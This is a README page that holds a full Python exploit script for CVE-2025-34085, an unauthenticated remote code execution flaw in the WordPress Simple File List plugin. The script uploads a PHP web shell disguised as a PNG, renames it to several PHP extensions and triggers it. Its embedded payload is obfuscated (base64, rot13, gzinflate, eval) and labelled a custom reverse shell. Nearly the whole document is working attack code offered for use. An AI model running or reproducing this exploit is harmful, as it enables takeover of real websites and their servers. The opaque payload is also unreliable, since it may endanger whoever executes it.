README.md
Rendering markdown...
#!/usr/bin/env python3
# Exploit for CVE-2025-34085
# By Mrj Haxcore
banner = r"""
_______ ________ ___ ___ ___ _____ ____ _ _ ___ ___ _____
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |___ \| || | / _ \ / _ \| ____|
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ __) | || |_| | | | (_) | |__
| | \ \/ / | __| |______| / /| | | |/ /|___ \ |______| |__ <|__ _| | | |> _ <|___ \
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | | | | |_| | (_) |___) |
\_____| \/ |______| |____|\___/____|____/ |____/ |_| \___/ \___/|____/
CVE-2025-34085 Unauthenticated RCE Exploit
Coded by Mrj Haxcore
"""
import requests
import hashlib
import time
import random
import string
import sys
import uuid
def rand_str(n=8):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=n))
# ====================== [ MODIFIED: CUSTOM REVERSE SHELL PAYLOAD ] ======================
def generate_payload():
return '''
function JgSd($sa48vzi3OnkajK) {
$sa48vzi3OnkajK = gzinflate(str_rot13(base64_decode($sa48vzi3OnkajK)));
for ($o=0;$o<strlen($sa48vzi3OnkajK);$o++) {
$sa48vzi3OnkajK[$o] = chr(ord($sa48vzi3OnkajK[$o])-6);
}
return $sa48vzi3OnkajK;
}
$sa48vzi3OnkajK = "epDBd4UwEFI/wb8YghCFtmLfdNy1Qyi0YGoiEmisoYmROBa0vB+vRAuPtlA2w5zce3RHC5EaVKQoLF9fsrecK8uLOIYv8BU61YAAxs57WJXt1z4sH5+eH7KcLxUvZd5Yg7w4kI9q+5cgM5TXlLqy/VR39fe1dAjCpZq95JrlYViweEBg7CeW06CtebApW6Ux8vY3/lC8UAHWnQWWVRh21ihrerVo9w4bDp3DSXmC6bFMZZLpserFP9Qjrim8BkJN6wwYpM42gvlbMZA1KdsLxgD7muYBBTOTJjVVVCfP3zaSJFgT1Q8TwUH4nAz8ooIt1a9uNkhT0c9LTAZ2siml/AyXYg==";
eval(JgSd($sa48vzi3OnkajK));
'''
# =========================================================================================
def upload_shell(target, filename, payload):
boundary = f"----WebKitFormBoundary{uuid.uuid4().hex[:16]}"
upload_url = f"{target}/wp-content/plugins/simple-file-list/ee-upload-engine.php"
upload_dir = "/wp-content/uploads/simple-file-list/"
timestamp = str(int(time.time()))
token = hashlib.md5(f'unique_salt{timestamp}'.encode()).hexdigest()
php_payload = f"<?php {payload} ?>"
fake_file = php_payload.encode()
body = (
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="eeSFL_ID"\r\n\r\n'
f"1\r\n"
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="eeSFL_FileUploadDir"\r\n\r\n'
f"{upload_dir}\r\n"
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="eeSFL_Timestamp"\r\n\r\n'
f"{timestamp}\r\n"
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="eeSFL_Token"\r\n\r\n'
f"{token}\r\n"
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="file"; filename="{filename}.png"\r\n'
f"Content-Type: image/png\r\n\r\n"
).encode() + fake_file + f"\r\n--{boundary}--\r\n".encode()
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Referer": f"{target}/wp-admin",
"Origin": target,
"Accept": "*/*"
}
print(f"[+] Uploading shell as {filename}.png...")
try:
r = requests.post(upload_url, data=body, headers=headers, timeout=10)
except Exception as e:
print(f"[-] Upload request failed: {e}")
return False
if r.status_code == 200 and "SUCCESS" in r.text:
print("[+] Upload successful.")
return True
else:
print(f"[-] Upload failed. Response code: {r.status_code}")
return False
def rename_shell(target, filename):
url = f"{target}/wp-content/plugins/simple-file-list/ee-file-engine.php"
extensions = ['php', 'php5', 'phtml', 'phar', 'php3', 'php4', 'pHp']
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'Referer': f'{target}/wp-admin',
'Origin': target,
'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest',
'Accept': '*/*'
}
for ext in extensions:
new_name = f"{filename}.{ext}"
data = {
'eeSFL_ID': '1',
'eeListFolder': '/',
'eeFileOld': f"{filename}.png",
'eeFileAction': f"Rename|{new_name}"
}
print(f"[+] Trying to rename to: {new_name}...")
try:
r = requests.post(url, data=data, headers=headers, timeout=10)
except Exception as e:
print(f"[-] Rename request failed: {e}")
continue
if r.status_code == 200:
print(f"[+] Rename successful: {new_name}")
return new_name
else:
print(f"[-] Rename failed. Response code: {r.status_code}")
print("[-] All rename attempts failed.")
return None
def trigger_shell(target, filename):
url = f"{target}/wp-content/uploads/simple-file-list/{filename}"
print(f"[+] Triggering shell: {url}")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Referer": target,
}
try:
r = requests.get(url, params={"cmd": "id"}, headers=headers, timeout=10)
except Exception as e:
print(f"[-] Shell trigger failed: {e}")
return
if r.status_code == 200:
print("[+] Shell output:")
print(r.text.strip())
else:
print(f"[-] Shell returned HTTP {r.status_code}")
def main():
print(banner)
if len(sys.argv) != 2:
print(f"Usage: python3 {sys.argv[0]} http://target.site")
sys.exit(1)
target = sys.argv[1].rstrip('/')
filename = rand_str()
payload = generate_payload()
if upload_shell(target, filename, payload):
new_filename = rename_shell(target, filename)
if new_filename:
trigger_shell(target, new_filename)
if __name__ == "__main__":
main()